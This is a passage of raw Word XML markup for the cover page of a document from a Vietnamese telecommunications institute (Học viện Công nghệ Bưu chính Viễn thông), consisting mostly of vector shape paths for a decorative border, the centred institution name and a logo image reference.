                <v:shape id="Freeform 31" o:spid="_x0000_s1053" style="position:absolute;left:6893;top:4208;width:40;height:36;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m,20r49,97l115,195r66,19l206,195r24,-39l238,117,230,78r-8,l214,78r-50,39l107,117,49,78,8,20,,,,20xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,3;8,20;19,33;30,36;35,33;39,26;40,20;39,13;37,13;36,13;28,20;18,20;8,13;1,3;0,0;0,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 32" o:spid="_x0000_s1054" style="position:absolute;left:6883;top:4117;width:14;height:75;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m8,448r16,l57,409,74,331r8,-78l74,156,41,39,24,,16,r,20l24,78r9,58l33,195,16,312,,389r8,59xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1,75;4,75;10,68;13,55;14,42;13,26;7,7;4,0;3,0;3,3;4,13;6,23;6,33;3,52;0,65;1,75" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 33" o:spid="_x0000_s1055" style="position:absolute;left:5631;top:6125;width:47;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" path="m165,58l197,39r33,l230,97r-8,117l230,389r17,117l272,623r8,38l272,661,255,623,222,545,140,350,49,136,16,58,8,19,,,16,,58,19,99,39r33,39l148,78,165,58xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="28,10;33,6;39,6;39,16;37,36;39,65;41,84;46,104;47,110;46,110;43,104;37,91;23,58;8,23;3,10;1,3;0,0;3,0;10,3;17,6;22,13;25,13;28,10" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 34" o:spid="_x0000_s1056" style="position:absolute;left:5609;top:6164;width:14;height:84;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8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" path="m58,506l17,370,,234,8,98,25,,49,,66,20,82,59,74,98,49,195,41,312r8,97l66,487r,19l58,506xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,84;3,61;0,39;1,16;4,0;8,0;11,3;14,10;13,16;8,32;7,52;8,68;11,81;11,84;10,84" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 35" o:spid="_x0000_s1057" style="position:absolute;left:5588;top:6109;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" path="m16,97l49,39,99,r49,l197,39r17,38l214,97r-8,l189,97r-74,19l74,136,41,194,25,214,8,194,,155,16,97xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3,16;8,6;17,0;25,0;33,6;36,13;36,16;35,16;32,16;19,19;12,22;7,32;4,35;1,32;0,25;3,16" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 36" o:spid="_x0000_s1058" style="position:absolute;left:5558;top:6284;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" path="m8,59r33,l74,20,91,r16,l165,78r8,l156,98,107,59r-16,l58,98,17,78,,59r,l8,59xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1,10;7,10;12,3;15,0;18,0;28,13;29,13;26,16;18,10;15,10;10,16;3,13;0,10;0,10;1,10" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 37" o:spid="_x0000_s1059" style="position:absolute;left:5559;top:6297;width:46;height:107;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m,20l17,59r32,77l132,331r82,195l247,603r16,39l272,623r,-39l247,409r,-78l255,273r,-20l247,253,198,234,140,175,74,98,25,20,,,,20xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,3;3,10;8,23;22,55;36,88;42,101;44,107;46,104;46,97;42,68;42,55;43,46;43,42;42,42;33,39;24,29;13,16;4,3;0,0;0,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 38" o:spid="_x0000_s1060" style="position:absolute;left:5601;top:6349;width:8;height:75;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5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" path="m17,428l,350,,311,9,272r8,-97l17,58,9,19,17,r,l25,19r17,97l50,233,42,350,25,447r,l17,428xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3,72;0,59;0,52;1,46;3,29;3,10;1,3;3,0;3,0;4,3;7,19;8,39;7,59;4,75;4,75;3,72" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 39" o:spid="_x0000_s1061" style="position:absolute;left:5629;top:6245;width:39;height:33;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m230,175l181,97,123,19,57,,32,,8,39,,78r,39l8,136,24,117,65,78r58,19l181,136r41,58l230,194r,-19xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="39,30;31,17;21,3;10,0;5,0;1,7;0,13;0,20;1,23;4,20;11,13;21,17;31,23;38,33;39,33;39,30" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 40" o:spid="_x0000_s1062" style="position:absolute;left:5665;top:6294;width:14;height:75;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m82,l57,,33,58,8,117,,214r8,97l49,428r8,19l66,447r8,-19l66,389,57,311r,-58l66,155,82,78,82,xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="14,0;10,0;6,10;1,20;0,36;1,52;8,72;10,75;11,75;13,72;11,65;10,52;10,42;11,26;14,13;14,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 41" o:spid="_x0000_s1063" style="position:absolute;left:6884;top:6125;width:47;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" path="m123,58l82,39r-33,l49,97,66,214,58,389,41,506,8,623,,661r8,l25,623,58,545,148,350,239,136,263,58,280,19,280,r-8,l230,19,189,39,148,78r-8,l123,58xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="21,10;14,6;8,6;8,16;11,36;10,65;7,84;1,104;0,110;1,110;4,104;10,91;25,58;40,23;44,10;47,3;47,0;46,0;39,3;32,6;25,13;23,13;21,10" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 42" o:spid="_x0000_s1064" style="position:absolute;left:6939;top:6164;width:13;height:84;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7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" path="m16,506l57,370,74,234,74,98,49,,33,,8,20,,59,,98r24,97l41,312r-8,97l8,487r,19l16,506xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3,84;10,61;13,39;13,16;9,0;6,0;1,3;0,10;0,16;4,32;7,52;6,68;1,81;1,84;3,84" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 43" o:spid="_x0000_s1065" style="position:absolute;left:6938;top:6109;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" path="m206,97l165,39,115,,66,,16,39,,77,,97r8,l33,97r74,19l140,136r33,58l189,214r17,-20l214,155,206,97xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="35,16;28,6;19,0;11,0;3,6;0,13;0,16;1,16;6,16;18,19;24,22;29,32;32,35;35,32;36,25;35,16" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 44" o:spid="_x0000_s1066" style="position:absolute;left:6974;top:6284;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" path="m156,59r-32,l91,20,74,,58,,,78r,l8,98,66,59r16,l115,98,156,78r9,-19l173,59r-17,xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,10;21,10;15,3;12,0;10,0;0,13;0,13;1,16;11,10;14,10;19,16;26,13;28,10;29,10;26,10" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 45" o:spid="_x0000_s1067" style="position:absolute;left:6957;top:6297;width:44;height:107;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m264,20r-9,39l223,136,140,331,50,526,17,603,,642,,623,,584,17,409r,-78l9,273r,-20l17,253,66,234r66,-59l198,98,239,20,264,r,20xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="44,3;43,10;37,23;23,55;8,88;3,101;0,107;0,104;0,97;3,68;3,55;2,46;2,42;3,42;11,39;22,29;33,16;40,3;44,0;44,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 46" o:spid="_x0000_s1068" style="position:absolute;left:6953;top:6349;width:7;height:75;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4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" path="m25,428l41,350r,-39l33,272,25,175,33,58r,-39l33,,25,,17,19,,116,,233,,350r17,97l25,447r,-19xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4,72;7,59;7,52;6,46;4,29;6,10;6,3;6,0;4,0;3,3;0,19;0,39;0,59;3,75;4,75;4,72" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 47" o:spid="_x0000_s1069" style="position:absolute;left:6893;top:6245;width:40;height:33;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="23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" path="m,175l49,97,115,19,181,r25,l230,39r8,39l230,117r-8,19l214,117,164,78,107,97,49,136,8,194r-8,l,175xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,30;8,17;19,3;30,0;35,0;39,7;40,13;39,20;37,23;36,20;28,13;18,17;8,23;1,33;0,33;0,30" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 48" o:spid="_x0000_s1070" style="position:absolute;left:6883;top:6294;width:14;height:75;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m8,l24,,57,58r17,59l82,214r-8,97l41,428,24,447r-8,l16,428r8,-39l33,311r,-58l16,155,,78,8,xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1,0;4,0;10,10;13,20;14,36;13,52;7,72;4,75;3,75;3,72;4,65;6,52;6,42;3,26;0,13;1,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 49" o:spid="_x0000_s1071" style="position:absolute;left:5616;top:4059;width:1330;height:133;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="797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" path="m246,117r-90,19l98,195,57,311,41,428r8,117l74,623r32,58l148,700r33,l213,662r25,-59l246,506,230,389,197,331r-41,19l148,389r-9,39l148,467r24,39l189,467r8,-19l205,486r-16,78l156,603,139,584,115,564r-9,-58l98,428r8,-78l131,292r25,-39l197,253r33,19l263,331r16,78l288,506r-9,117l246,720r-33,58l172,798,98,778,41,681,8,545,,409,16,253,65,136,139,39,197,19,255,,7726,r58,19l7833,39r83,97l7957,253r16,156l7965,545r-33,136l7883,778r-74,20l7768,778r-42,-58l7702,623,7685,506r8,-97l7718,331r33,-59l7784,253r33,l7850,292r16,58l7875,428r,78l7858,564r-16,20l7817,603r-25,-39l7768,486r16,-38l7792,467r17,39l7833,467r,-39l7833,389r-16,-39l7784,331r-41,58l7726,506r9,97l7759,662r33,38l7833,700r33,-19l7899,623r25,-78l7932,428r-8,-117l7883,195r-66,-59l7726,117r-7480,xe" fillcolor="#b09870" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,23;10,52;8,91;18,114;30,117;40,101;38,65;26,58;23,71;29,84;33,75;32,94;23,97;18,84;18,58;26,42;38,45;47,68;47,104;36,130;16,130;1,91;3,42;23,7;43,0;1298,3;1320,23;1330,68;1323,114;1303,133;1289,120;1282,84;1287,55;1298,42;1309,49;1314,71;1311,94;1304,101;1296,81;1300,78;1307,78;1307,65;1298,55;1289,84;1294,110;1307,117;1318,104;1323,71;1315,33;1289,20" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 50" o:spid="_x0000_s1072" style="position:absolute;left:5551;top:4212;width:56;height:2062;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="33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" path="m337,11772r,136l321,12025r-33,175l230,12317r-58,39l107,12337r-58,-78l16,12142,,11967r8,-97l41,11772r41,-78l123,11675r49,19l205,11753r17,78l238,11908r,78l222,12064r-25,39l156,12122r-33,l107,12084r-17,-39l90,11986r8,-58l131,11870r25,38l140,11928r-17,39l140,12025r16,l181,12025r16,-39l197,11908r-25,-97l131,11772r-41,20l57,11850r-16,78l41,12025r8,78l74,12181r41,58l156,12259r58,-20l255,12142r33,-156l296,11772,296,583,288,369,255,233,214,136,156,97r-41,19l74,175,49,253r-8,97l41,428r16,77l90,564r41,19l172,544r25,-77l197,369,181,350,156,330r-16,20l123,408r17,39l156,467r-25,19l98,447,90,369r,-39l107,291r16,-38l156,233r41,20l222,311r16,58l238,467r-16,77l205,622r-33,39l123,681,82,661,41,603,8,505,,408,16,233,49,97,107,19,172,r58,38l288,155r33,175l337,467r,136l337,11772xe" fillcolor="#b09870" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="56,1987;48,2036;29,2062;8,2046;0,1997;7,1965;20,1948;34,1961;40,1987;37,2013;26,2023;18,2017;15,2000;22,1981;23,1991;23,2007;30,2007;33,1987;22,1965;9,1978;7,2007;12,2033;26,2046;42,2026;49,1965;48,62;36,23;19,19;8,42;7,71;15,94;29,91;33,62;26,55;20,68;26,78;16,75;15,55;20,42;33,42;40,62;37,91;29,110;14,110;1,84;3,39;18,3;38,6;53,55;56,101" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 51" o:spid="_x0000_s1073" style="position:absolute;left:5616;top:6294;width:1330;height:133;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="797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" path="m246,700l156,681,98,603,57,506,41,369r8,-97l74,175r32,-58l148,97r33,l213,136r25,78l246,311r-16,97l197,467r-41,l148,428r-9,-59l148,331r24,-20l189,331r8,38l205,311,189,233,156,214r-17,l115,253r-9,39l98,369r8,98l131,525r25,39l197,564r33,-19l263,486r16,-78l288,292r-9,-98l246,97,213,19,172,,98,39,41,136,8,253,,408,16,545,65,681r74,78l197,798r58,l7726,798r58,l7833,759r83,-78l7957,545r16,-137l7965,253,7932,136,7883,39,7809,r-41,19l7726,97r-24,97l7685,292r8,116l7718,486r33,59l7784,564r33,l7850,525r16,-58l7875,369r,-77l7858,253r-16,-39l7817,214r-25,19l7768,311r16,58l7792,331r17,-20l7833,331r,38l7833,428r-16,39l7784,467r-41,-59l7726,311r9,-97l7759,136r33,-39l7833,97r33,20l7899,175r25,97l7932,369r-8,137l7883,603r-66,78l7726,700r-7480,xe" fillcolor="#b09870" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,114;10,84;8,45;18,20;30,16;40,36;38,68;26,78;23,62;29,52;33,62;32,39;23,36;18,49;18,78;26,94;38,91;47,68;47,32;36,3;16,7;1,42;3,91;23,127;43,133;1298,133;1320,114;1330,68;1323,23;1303,0;1289,16;1282,49;1287,81;1298,94;1309,88;1314,62;1311,42;1304,36;1296,52;1300,55;1307,55;1307,71;1298,78;1289,52;1294,23;1307,16;1318,29;1323,62;1315,101;1289,117" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 52" o:spid="_x0000_s1074" style="position:absolute;left:6955;top:4212;width:56;height:2062;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="33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" path="m49,11772r8,214l82,12142r49,97l181,12259r49,-20l263,12181r25,-78l296,12025r,-97l280,11850r-25,-58l214,11772r-50,39l140,11908r8,78l156,12025r25,l205,12025r9,-58l197,11928r-8,-20l205,11870r33,58l255,11986r-8,59l238,12084r-24,38l181,12122r-33,-19l123,12064r-16,-78l107,11908r8,-77l140,11753r33,-59l214,11675r49,19l304,11772r25,98l337,11967r-8,175l288,12259r-58,78l173,12356r-66,-39l57,12200,16,12025,8,11908,,11772,,603,8,467,16,330,57,155,107,38,173,r57,19l288,97r41,136l337,408r-8,97l304,603r-41,58l214,681,173,661,140,622,115,544r-8,-77l107,369r16,-58l148,253r33,-20l214,253r24,38l247,330r8,39l238,447r-33,39l189,467r8,-20l214,408r-9,-58l181,330r-25,20l148,369r-8,98l164,544r50,39l255,564r25,-59l296,428r,-78l288,253,263,175,230,116,181,97r-50,39l82,233,57,369,49,583r,11189xe" fillcolor="#b09870" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="9,2000;22,2042;38,2042;48,2020;49,1991;42,1968;27,1971;25,2000;30,2007;36,1997;31,1987;40,1991;41,2010;36,2023;25,2020;18,2000;19,1974;29,1952;44,1952;55,1981;55,2026;38,2059;18,2055;3,2007;0,1965;1,78;9,26;29,0;48,16;56,68;51,101;36,114;23,104;18,78;20,52;30,39;40,49;42,62;34,81;33,75;34,58;26,58;23,78;36,97;47,84;49,58;44,29;30,16;14,39;8,97" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 53" o:spid="_x0000_s1075" style="position:absolute;left:5590;top:4147;width:46;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" path="m49,20l25,,8,20,,78r8,39l238,662r17,19l271,662r9,-39l271,565,49,20xe" fillcolor="#b09870" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8,3;4,0;1,3;0,13;1,19;39,110;42,113;45,110;46,103;45,94;8,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 54" o:spid="_x0000_s1076" style="position:absolute;left:6926;top:4147;width:46;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" path="m239,20l255,r17,20l280,78r-8,39l50,662,25,681,8,662,,623,8,565,239,20xe" fillcolor="#b09870" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="39,3;42,0;45,3;46,13;45,19;8,110;4,113;1,110;0,103;1,94;39,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 55" o:spid="_x0000_s1077" style="position:absolute;left:5590;top:6229;width:46;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" path="m49,642l25,661,8,642,,603,8,544,238,19,255,r16,19l280,58r-9,58l49,642xe" fillcolor="#b09870" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8,107;4,110;1,107;0,100;1,91;39,3;42,0;45,3;46,10;45,19;8,107" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 56" o:spid="_x0000_s1078" style="position:absolute;left:6926;top:6229;width:46;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" path="m239,642r16,19l272,642r8,-39l272,544,50,19,25,,8,19,,58r8,58l239,642xe" fillcolor="#b09870" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="39,107;42,110;45,107;46,100;45,91;8,3;4,0;1,3;0,10;1,19;39,107" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 57" o:spid="_x0000_s1079" style="position:absolute;left:5536;top:4020;width:1490;height:20;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="89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" path="m50,117l,,8929,r-42,117l50,117xe" fillcolor="#b0b0b0" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8,20;0,0;1490,0;1483,20;8,20" o:connectangles="0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 58" o:spid="_x0000_s1080" style="position:absolute;left:5536;top:4020;width:7;height:2446;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="42,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" path="m,14556r42,97l42,,,117,,14556xe" fillcolor="#b0b0b0" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,2430;7,2446;7,0;0,20;0,2430" o:connectangles="0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 59" o:spid="_x0000_s1081" style="position:absolute;left:5536;top:6450;width:1490;height:16;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="89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" path="m50,l,97r8929,l8887,,50,xe" fillcolor="#b0b0b0" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8,0;0,16;1490,16;1483,0;8,0" o:connectangles="0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 60" o:spid="_x0000_s1082" style="position:absolute;left:7018;top:4020;width:8;height:2446;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="50,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" path="m50,14556l,14653,,,50,117r,14439xe" fillcolor="#b0b0b0" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8,2430;0,2446;0,0;8,20;8,2430" o:connectangles="0,0,0,0,0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377E34A" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49576254" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="3420"/>
        </w:tabs>
        <w:ind w:right="-51"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-----</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F09A"/>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F09B"/>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F026"/>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F09A"/>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F09B"/>
      </w:r>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863FF31" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F41C9FF" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6322BCA9" wp14:editId="46AC79AF">
            <wp:extent cx="1162050" cy="1323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802" cy="1324832"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EF3B9D" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CED929" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE96E58" w14:textId="1569F3BD" w:rsidR="007C3349" w:rsidRPr="00826669" w:rsidRDefault="007C3349" w:rsidP="00826669">
      <w:pPr>
